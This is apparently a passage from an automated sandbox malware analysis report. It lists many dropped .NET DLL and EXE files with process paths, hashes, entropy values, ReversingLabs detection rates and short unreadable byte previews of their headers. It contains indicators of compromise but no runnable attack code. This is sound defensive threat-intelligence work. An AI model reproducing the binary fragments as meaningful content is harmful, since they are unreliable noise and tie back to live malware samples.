                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):39936
                                                                                    Entropy (8bit):5.660491370279985
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                                    MD5:240E98D38E0B679F055470167D247022
                                                                                    SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                                    SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                                    SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):64000
                                                                                    Entropy (8bit):5.857602289000348
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                    MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                    SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                    SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                    SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):28160
                                                                                    Entropy (8bit):5.570953308352568
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                                                    MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                                                    SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                                                    SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                                                    SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):69632
                                                                                    Entropy (8bit):5.932541123129161
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):23552
                                                                                    Entropy (8bit):5.519109060441589
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):34816
                                                                                    Entropy (8bit):5.636032516496583
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                    MD5:996BD447A16F0A20F238A611484AFE86
                                                                                    SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                    SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                    SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):41472
                                                                                    Entropy (8bit):5.6808219961645605
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                    MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                    SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                    SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                    SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):34304
                                                                                    Entropy (8bit):5.618776214605176
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                    MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                    SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                    SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                    SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):33280
                                                                                    Entropy (8bit):5.634433516692816
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                    MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                    SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                    SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                    SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):23552
                                                                                    Entropy (8bit):5.529329139831718
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                    MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                    SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                    SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                    SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):38912
                                                                                    Entropy (8bit):5.679286635687991
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                                    MD5:9E910782CA3E88B3F87826609A21A54E
                                                                                    SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                                    SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                                    SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):39936
                                                                                    Entropy (8bit):5.629584586954759
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                    MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                    SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                    SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                    SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):36352
                                                                                    Entropy (8bit):5.668291349855899
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                    MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                    SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                    SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                    SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):126976
                                                                                    Entropy (8bit):6.057993947082715
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                    MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                    SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                    SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                    SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):126976
                                                                                    Entropy (8bit):6.057993947082715
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                    MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                    SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                    SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                    SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):34816
                                                                                    Entropy (8bit):5.636032516496583
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                                    MD5:996BD447A16F0A20F238A611484AFE86
                                                                                    SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                                    SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                                    SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):70144
                                                                                    Entropy (8bit):5.909536568846014
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                    MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                    SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                    SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                    SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):294912
                                                                                    Entropy (8bit):6.010605469502259
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                    MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                    SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                    SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                    SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 11%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                    Category:dropped
                                                                                    Size (bytes):3420843
                                                                                    Entropy (8bit):7.992393726932408
                                                                                    Encrypted:true
                                                                                    SSDEEP:98304:2azh3piA6B85AR1lznmf/50X4ajKeSHqCwvHJ7pP2U:hzh3pgBzHZs50X5YM9
                                                                                    MD5:C9D8BCE0425ED81346B9A43F148D948B
                                                                                    SHA1:D3BCB8F02EF3732FFA70FC798CD4AD3D77BBBDE6
                                                                                    SHA-256:884DE0BA4D113A1674B112F76B7D6AF9BB11C562D6B58155E974E549694E0F58
                                                                                    SHA-512:60E0D21DB0518D66F4546DCEB978B15D2EB87347CC1676B7420EB2A6C4C1C6FA947D31AE8CB70CE880B76F931702AAAB51C46F559DD91A49C9A4BDC83B75368B
                                                                                    Malicious:true
                                                                                    Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:ASCII text, with very long lines (813), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):813
                                                                                    Entropy (8bit):5.901049085746739
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:avtpqH0Vl3ssxkH22HxqcpxDPTqd5MTL0eW:avtpqH0Vl8sxp2HxqexDPTWsW
                                                                                    MD5:4632619EBE0473EFA1C9A63235C768B7
                                                                                    SHA1:2BF3C958D83A7C14E825E99F685C8BED7B310F1B
                                                                                    SHA-256:EA19755BD9B74CB3E72986160441F34C54586E564B27D1B52698E1F6B3868109
                                                                                    SHA-512:8F9A3985257AF732D5EBA9DE28DF90167BBB019CDEF010D5D5F7D8C35AAA817D7CA2B1589D4B549CA2A623E80BDB0D7D2974971D56F9224F24CDFF60D4F25623
                                                                                    Malicious:false
